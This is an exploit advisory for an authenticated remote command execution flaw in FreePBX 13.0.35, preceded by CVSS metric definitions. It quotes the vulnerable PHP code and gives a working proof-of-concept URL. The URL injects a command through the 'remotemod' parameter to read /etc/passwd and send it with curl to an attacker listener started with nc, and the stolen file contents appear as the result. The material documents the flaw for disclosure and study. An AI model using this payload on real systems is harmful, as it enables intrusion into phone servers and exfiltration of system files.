The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
FreePBX 13.0.35 Remote command executionVulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : Ahmed sultan (0x4148)
Email : [email protected]
Summary : FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX), an open source communication server,
With over 1 MILLION production systems worldwide and 20,000 new systems installed monthly,
the FreePBX community continues to out-perform the industry's commercial efforts.
The FreePBX EcoSystem has developed over the past decade to be the most widely deployed open source PBX platform in use across the world.
Vulnerability details :
Freepbx suffer from (Authenticated) remote code execution flaw
Boring technical stuff
File : functions.inc.php
function get_headers_assoc($url) {
global $amp_conf;
if ($amp_conf['MODULEADMINWGET']) {
FreePBX::Curl()->setEnvVariables();
exec("wget --spider --server-response -q ".$url." 2>&1", $wgetout, $exitstatus);
$headers = array();
if($exitstatus == 0 && !empty($wgetout)) {
foreach($wgetout as $value) {
$ar = explode(':', $value);
$key = trim($ar[0]);
if(isset($ar[1])) {
$value = trim($ar[1]);
$headers[strtolower($key)] = trim($value);
}
the $url is not being sanitized before being passed to the 'exec' function which lead to Command execution flaw
The function is being called at
File : libraries/modulefunctions.class.php
Line 1539 : function handledownload($module_location, $progress_callback = null) {
...................................................
// invoke progress callback
if (!is_array($progress_callback) && function_exists($progress_callback)) {
$progress_callback('getinfo', array('module'=>$modulename));
} else if(is_array($progress_callback) && method_exists($progress_callback[0],$progress_callback[1])) {
$progress_callback[0]->$progress_callback[1]('getinfo', array('module'=>$modulename));
}
$file = basename($module_location);
$filename = $amp_conf['AMPWEBROOT']."/admin/modules/_cache/".$file;
// Check each URL until get_headers_assoc() returns something intelligible. We then use
// that URL and hope the file is there, we won't check others.
-=>>>>>> $headers = get_headers_assoc($module_location);
if (empty($headers)) {
return array(sprintf(_('Failed download module tarball from %s, server may be down'),$module_location));
}
the handledownload function is called via the admin panel whenever the page.modules.php file is included
which can be basically done using admin/config.php?display=modules
File : page.modules.php
Line 174 : switch ($action) {
..............................
Line 643 : case 'upload':
..............................
Line 658 : $displayvars['processed'] = false;
if (isset($_REQUEST['upload']) && isset($_FILES['uploadmod']) && !empty($_FILES['uploadmod']['name'])) {
$displayvars['res'] = $modulef->handleupload($_FILES['uploadmod']);
$displayvars['processed'] = true;
} elseif (isset($_REQUEST['download']) && !empty($_REQUEST['remotemod'])) {
$displayvars['res'] = $modulef->handledownload($_REQUEST['remotemod']);
$displayvars['processed'] = true;
} elseif(isset($_REQUEST['remotemod'])) {
$displayvars['res'][] = 'Nothing to download or upload';
$displayvars['processed'] = true;
}
the 'remotemod' parameter is passed to exec function without being sanitized , which lead to the mentioned flaw
POC
On attacker's side run nc -lvp 8080
on target's side loginto the panel and then browse to
http://TARGET/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk
Result
[0x4148:/lab]# nc -lvp 8080
listening on [any] 8080 ...
DNS fwd/rev mismatch: x.x.x.x != xxxxxx.com
connect to [ATTACKER] from x.x.x.x.x [Target] 45934
POST //0x4148.jnk HTTP/1.1
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Host: ATTACKER:8080
Accept: */*
Content-Length: 1391
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
asterisk:x:499:498::/home/asterisk:/bin/bash
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:497:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
prosody:x:496:495::/var/lib/prosody:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum